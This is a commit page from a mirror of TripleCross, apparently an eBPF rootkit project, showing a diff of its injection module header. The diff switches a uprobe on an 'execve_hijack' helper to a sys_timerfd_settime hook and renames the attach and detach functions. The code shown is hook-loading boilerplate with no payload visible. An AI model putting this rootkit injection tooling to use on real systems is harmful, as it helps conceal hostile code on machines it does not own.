admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-25 19:03:07 +08:00
Code Issues Packages Projects Releases Wiki Activity

Added extraction of original jump instruction and opcodes

Browse Source
This commit is contained in:
h3xduck
2022-03-15 18:36:59 -04:00
parent 0c88d5baa9
commit 671e2d671d
18 changed files with 5736 additions and 1630 deletions
Download Patch File Download Diff File Expand all files Collapse all files

16
src/user/include/modules/injection.h
View File

@@ -8,19 +8,19 @@
#include "common.h"
//Connections
int attach_uprobe_execute_command(struct kit_bpf *skel){
skel->links.uprobe_execute_command = bpf_program__attach_uprobe(skel->progs.uprobe_execute_command, false, -1, "/home/osboxes/TFG/src/helpers/execve_hijack", 4992);
printf("SET\n");
return libbpf_get_error(skel->links.tp_sys_enter_execve);
int attach_sys_timerfd_settime(struct kit_bpf *skel){
//skel->links.kprobe_sys_geteuid = bpf_program__attach_uprobe(skel->progs.uprobe_execute_command, false, -1, "/home/osboxes/TFG/src/helpers/execve_hijack", 4992);
skel->links.sys_timerfd_settime = bpf_program__attach(skel->progs.sys_timerfd_settime);
return libbpf_get_error(skel->links.sys_timerfd_settime);
}
int attach_injection_all(struct kit_bpf *skel){
return attach_uprobe_execute_command(skel);
return attach_sys_timerfd_settime(skel);
}
int detach_uprobe_execute_command(struct kit_bpf *skel){
int err = detach_link_generic(skel->links.uprobe_execute_command);
int detach_sys_timerfd_settime(struct kit_bpf *skel){
int err = detach_link_generic(skel->links.sys_timerfd_settime);
if(err<0){
fprintf(stderr, "Failed to detach fs link\n");
return -1;
@@ -29,7 +29,7 @@ int detach_uprobe_execute_command(struct kit_bpf *skel){
}
int detach_injection_all(struct kit_bpf *skel){
return detach_uprobe_execute_command(skel);
return detach_sys_timerfd_settime(skel);
}
#endif